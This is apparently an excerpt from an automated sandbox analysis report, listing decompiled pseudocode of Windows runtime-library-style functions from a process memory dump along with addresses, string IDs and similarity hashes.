                                          0x0114facb
                                          0x0114faa4
                                          0x0114fa91
                                          0x010f2e6f
                                          0x010f2e6f
                                          0x010f2e5f
                                          0x0114fa13
                                          0x0114fa15
                                          0x0114fa17
                                          0x0114fa1f
                                          0x0114fa21
                                          0x0114fa22
                                          0x0114fa25
                                          0x0114fa28
                                          0x0114fa2f
                                          0x0114fa2f
                                          0x0114fa2a
                                          0x0114fa2a
                                          0x0114fa2a
                                          0x0114fa31
                                          0x0114fa34
                                          0x0114fa36
                                          0x0114fa3c
                                          0x0114fa3e
                                          0x0114fa41
                                          0x0114fa43
                                          0x0114fa45
                                          0x0114fa45
                                          0x0114fa41
                                          0x0114fa3c
                                          0x0114fa4a
                                          0x0114fa4f
                                          0x0114fa51
                                          0x0114fa53
                                          0x0114fa56
                                          0x0114fa5b
                                          0x0114fa5e
                                          0x00000000
                                          0x0114fa5e
                                          0x010f2e23

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: d40002a47583722d49b31a6e51ebab04edcd5952f2387953822fc4062c604a2c
                                          • Instruction ID: 0359315b6b24a094943a4fd52f3abb249a52b48fa26ce41e93736a82edcd2e37
                                          • Opcode Fuzzy Hash: d40002a47583722d49b31a6e51ebab04edcd5952f2387953822fc4062c604a2c
                                          • Instruction Fuzzy Hash: 17615731A006469FEB3ADF6CC841B7E7BE5EB40B18F2442A9E691977C1D730D942C782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E011C0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E011BFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E011C1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01139730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E011BA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E011BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x11e8b04 >> 0x14) + (_v44 -  *0x11e8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01117D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E011B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01117D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E011AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x11e8724 & 0x00000008) != 0) {
						E011B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011C15B5(0x11e8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                          0x011c0eb7
                                          0x011c0eb9
                                          0x011c0ec0
                                          0x011c0ec2
                                          0x011c0ecd
                                          0x011c105b
                                          0x011c105b
                                          0x011c1061
                                          0x011c1066
                                          0x011c1066
                                          0x011c106b
                                          0x011c1073
                                          0x011c1073
                                          0x011c0ed3
                                          0x011c0ed6
                                          0x011c0edc
                                          0x011c0ee0
                                          0x011c0ee7
                                          0x011c0ef0
                                          0x011c0ef5
                                          0x011c0efa
                                          0x011c0efc
                                          0x011c0efd
                                          0x011c0f03
                                          0x011c0f04
                                          0x011c0f06
                                          0x011c0f07
                                          0x011c0f09
                                          0x011c0f0e
                                          0x011c0f14
                                          0x011c0f23
                                          0x011c0f2d
                                          0x011c0f34
                                          0x011c0f34
                                          0x011c0f14
                                          0x011c0f52
                                          0x00000000
                                          0x00000000
                                          0x011c0f58
                                          0x011c0f73
                                          0x011c0f74
                                          0x011c0f79
                                          0x011c0f7d
                                          0x011c0f80
                                          0x011c0f86
                                          0x011c0fab
                                          0x011c0fb5
                                          0x011c0fc6
                                          0x011c0fd1
                                          0x011c0fe3
                                          0x011c0fd3
                                          0x011c0fdc
                                          0x011c0fdc
                                          0x011c0feb
                                          0x011c1009
                                          0x011c1009
                                          0x011c1015
                                          0x011c1027
                                          0x011c1017
                                          0x011c1020
                                          0x011c1020
                                          0x011c102f
                                          0x011c103c
                                          0x011c103c
                                          0x011c1048
                                          0x011c1050
                                          0x011c1050
                                          0x011c1055
                                          0x00000000
                                          0x011c1055
                                          0x011c0f88
                                          0x011c0f9e
                                          0x011c0fa2
                                          0x011c0fa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011c0fa9
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 2064188d1081ee9532e8d3388fcc3e1963d9ea4ae9ec0295727d2010978feeb7
                                          • Instruction ID: b100980fef8c7ad80fe8baa1c2b59fca8645bffa12278753122ced55984b5af6
                                          • Opcode Fuzzy Hash: 2064188d1081ee9532e8d3388fcc3e1963d9ea4ae9ec0295727d2010978feeb7
                                          • Instruction Fuzzy Hash: B3519D71304342DBD329DF28D980B5BBBE5EBD8B04F04092CFA9697291D770E845CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0112F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01114120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01139830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01139990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011395D0();
							goto L11;
						} else {
							_t109 = L01114620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0113F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011395D0();
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                          0x0112f0d3
                                          0x0112f0d9
                                          0x0112f0e0
                                          0x0112f0e7
                                          0x0112f0f2
                                          0x0112f0f4
                                          0x0112f0f8
                                          0x0112f100
                                          0x0112f108
                                          0x0112f10d
                                          0x0112f115
                                          0x0112f116
                                          0x0112f11f
                                          0x0112f123
                                          0x0112f124
                                          0x0112f12c
                                          0x0112f130
                                          0x0112f134
                                          0x0112f13d
                                          0x0112f144
                                          0x0112f14b
                                          0x0112f152
                                          0x0116bab0
                                          0x0116bab0
                                          0x0112f158
                                          0x0112f158
                                          0x0112f15a
                                          0x0112f160
                                          0x0112f165
                                          0x0112f166
                                          0x0112f16f
                                          0x0112f173
                                          0x0116baa7
                                          0x0116baa7
                                          0x0116baab
                                          0x00000000
                                          0x0112f179
                                          0x0112f18d
                                          0x0112f191
                                          0x0116baa2
                                          0x00000000
                                          0x0112f197
                                          0x0112f19b
                                          0x0112f1a2
                                          0x0112f1a9
                                          0x0112f1af
                                          0x0112f1b2
                                          0x0112f1b6
                                          0x0112f1b9
                                          0x0112f1c4
                                          0x0112f1d8
                                          0x0112f1df
                                          0x0112f1e3
                                          0x0112f1eb
                                          0x0112f1ee
                                          0x0112f1f4
                                          0x0112f20f
                                          0x0116bab7
                                          0x0116babb
                                          0x0116bacc
                                          0x0116bad1
                                          0x0112f215
                                          0x0112f218
                                          0x0112f226
                                          0x0112f22b
                                          0x00000000
                                          0x0112f22b
                                          0x0112f1f6
                                          0x0112f1f6
                                          0x0112f1f9
                                          0x0112f1fb
                                          0x0112f1fb
                                          0x0112f1f4
                                          0x0112f191
                                          0x0112f173
                                          0x0112f152
                                          0x0112f203

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 012cb0d723113998ad76787235c35e6912666570f019aa883cddf548241c0ff5
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: EB51AD712047119FC324CF18C840A6BBBF8FF98714F108A2EFA9587690E7B4E911CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01173540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E01173540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x11ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01130BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01173706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0113FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01173540;
						E0113FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0114DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01180C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011397C0();
					}
					return E0113B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01173971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01173884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0113FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01139650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01173787(_a4,  &_v352, _t80);
						}
					}
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                          0x01173552
                                          0x0117355a
                                          0x0117355d
                                          0x01173566
                                          0x01173567
                                          0x0117357e
                                          0x0117358f
                                          0x011735a1
                                          0x011735a5
                                          0x0117366b
                                          0x0117366b
                                          0x0117366d
                                          0x01173672
                                          0x01173679
                                          0x01173685
                                          0x0117368d
                                          0x0117369d
                                          0x011736a7
                                          0x011736b8
                                          0x011736c6
                                          0x011736c7
                                          0x011736dc
                                          0x011736e1
                                          0x011736e7
                                          0x011736e9
                                          0x011736e9
                                          0x01173703
                                          0x01173703
                                          0x011735b5
                                          0x011735c0
                                          0x011735c4
                                          0x00000000
                                          0x00000000
                                          0x011735ca
                                          0x011735d7
                                          0x011735e2
                                          0x011735e6
                                          0x011735e8
                                          0x011735f5
                                          0x011735fa
                                          0x01173603
                                          0x01173604
                                          0x01173609
                                          0x0117360a
                                          0x01173612
                                          0x01173613
                                          0x0117361e
                                          0x01173622
                                          0x01173628
                                          0x0117362f
                                          0x0117362f
                                          0x01173636
                                          0x01173638
                                          0x0117363b
                                          0x01173642
                                          0x01173642
                                          0x01173636
                                          0x01173657
                                          0x01173657
                                          0x0117365c
                                          0x01173662
                                          0x01173669
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: b948d43634f73d9433d6610b55243310df454e2fa1ce59d25e515480dc6ed310
                                          • Instruction ID: 80ec98cceaf0d4f7c3d3dbb2e642606a1dc0f170a16d5a62f78214c988464797
                                          • Opcode Fuzzy Hash: b948d43634f73d9433d6610b55243310df454e2fa1ce59d25e515480dc6ed310
                                          • Instruction Fuzzy Hash: 264152B2D1052D9BDB25DA50CC80FEEB77CAB44718F0045A5EA18AB240DB309F89DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E011C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01139730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E011BA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E011BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E011C1293(_t79, _v40, E011C07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01117D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E011B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                          0x011c05c5
                                          0x011c05ca
                                          0x011c05d3
                                          0x011c06db
                                          0x011c06db
                                          0x011c06dd
                                          0x011c06e3
                                          0x011c06e3
                                          0x011c05dd
                                          0x011c05e7
                                          0x011c05f6
                                          0x011c0600
                                          0x011c0607
                                          0x011c0610
                                          0x011c0615
                                          0x011c061a
                                          0x011c061c
                                          0x011c061e
                                          0x011c0624
                                          0x011c0625
                                          0x011c0627
                                          0x011c0628
                                          0x011c0631
                                          0x011c0640
                                          0x011c064d
                                          0x011c0654
                                          0x011c0654
                                          0x011c0631
                                          0x011c066d
                                          0x011c0674
                                          0x00000000
                                          0x00000000
                                          0x011c0692
                                          0x011c069e
                                          0x011c06b0
                                          0x011c06a0
                                          0x011c06a9
                                          0x011c06a9
                                          0x011c06b8
                                          0x011c06d6
                                          0x011c06d6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: 97d38cffbd5c8f3991c2d5476607290cb271ade2ad11d861fe2815f41e98b4e5
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: CF312632200316ABE714DE28CC85F977BD9EBD8B58F144228FA44DB6C0D770E904CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01173884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E01173884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01139650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01114620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01139650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                          0x01173893
                                          0x01173896
                                          0x01173899
                                          0x0117389f
                                          0x011738a0
                                          0x011738a4
                                          0x011738a9
                                          0x011738ac
                                          0x011738ad
                                          0x011738ae
                                          0x011738af
                                          0x011738b1
                                          0x011738b4
                                          0x011738bb
                                          0x011738bc
                                          0x011738bd
                                          0x011738c4
                                          0x011738c8
                                          0x011738ca
                                          0x011738ca
                                          0x011738d5
                                          0x0117393e
                                          0x01173940
                                          0x01173942
                                          0x01173952
                                          0x01173954
                                          0x01173961
                                          0x01173961
                                          0x01173967
                                          0x0117396e
                                          0x0117396e
                                          0x01173947
                                          0x0117394c
                                          0x00000000
                                          0x0117394c
                                          0x011738ea
                                          0x011738ee
                                          0x011738f8
                                          0x011738f9
                                          0x011738ff
                                          0x01173900
                                          0x01173902
                                          0x01173903
                                          0x0117390b
                                          0x0117390f
                                          0x01173950
                                          0x00000000
                                          0x01173950
                                          0x01173915
                                          0x0117391d
                                          0x0117391d
                                          0x01173922
                                          0x01173926
                                          0x00000000
                                          0x01173928
                                          0x0117392b
                                          0x0117392b
                                          0x01173935
                                          0x01173937
                                          0x01173937
                                          0x00000000
                                          0x01173935
                                          0x01173926
                                          0x011738f0
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 1c936569faea8a090f2990a7ef270c503813a5d217a84c11e634fe54c0ae7e26
                                          • Instruction ID: 3588a3eddf17a6bd4b2953ff00eb243ae4d02a26701271337b0fbc272644ffc0
                                          • Opcode Fuzzy Hash: 1c936569faea8a090f2990a7ef270c503813a5d217a84c11e634fe54c0ae7e26
                                          • Instruction Fuzzy Hash: D131057290150AEFEB1DDA58C945EABFB74FB80B20F114169E924A7380E7309E00E7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E0112D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x11ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01114120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0113B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011395D0();
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                          0x0112d29c
                                          0x0112d2a6
                                          0x0112d2b1
                                          0x0112d2b5
                                          0x0112d2b6
                                          0x0112d2bc
                                          0x0112d2bd
                                          0x0112d2be
                                          0x0112d2bf
                                          0x0112d2c2
                                          0x0112d2c4
                                          0x0112d2cc
                                          0x0112d384
                                          0x0112d34b
                                          0x0112d34f
                                          0x0112d350
                                          0x0112d351
                                          0x0112d35c
                                          0x0112d35c
                                          0x0112d2d6
                                          0x0112d2da
                                          0x0112d2e1
                                          0x0112d361
                                          0x0112d369
                                          0x0112d36d
                                          0x0112d2e3
                                          0x0112d2e3
                                          0x0112d2e3
                                          0x0112d2e5
                                          0x0112d2ed
                                          0x0112d2f5
                                          0x0112d2fa
                                          0x0112d302
                                          0x0112d303
                                          0x0112d30b
                                          0x0112d30f
                                          0x0112d313
                                          0x0112d318
                                          0x0112d31c
                                          0x0112d320
                                          0x0112d379
                                          0x0112d37d
                                          0x00000000
                                          0x00000000
                                          0x0116affe
                                          0x0116b001
                                          0x0116b011
                                          0x00000000
                                          0x0112d322
                                          0x0112d322
                                          0x0112d330
                                          0x0112d337
                                          0x0112d35d
                                          0x0112d339
                                          0x0112d33f
                                          0x0112d38c
                                          0x0112d38c
                                          0x0112d33f
                                          0x0112d349
                                          0x00000000
                                          0x0112d349

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
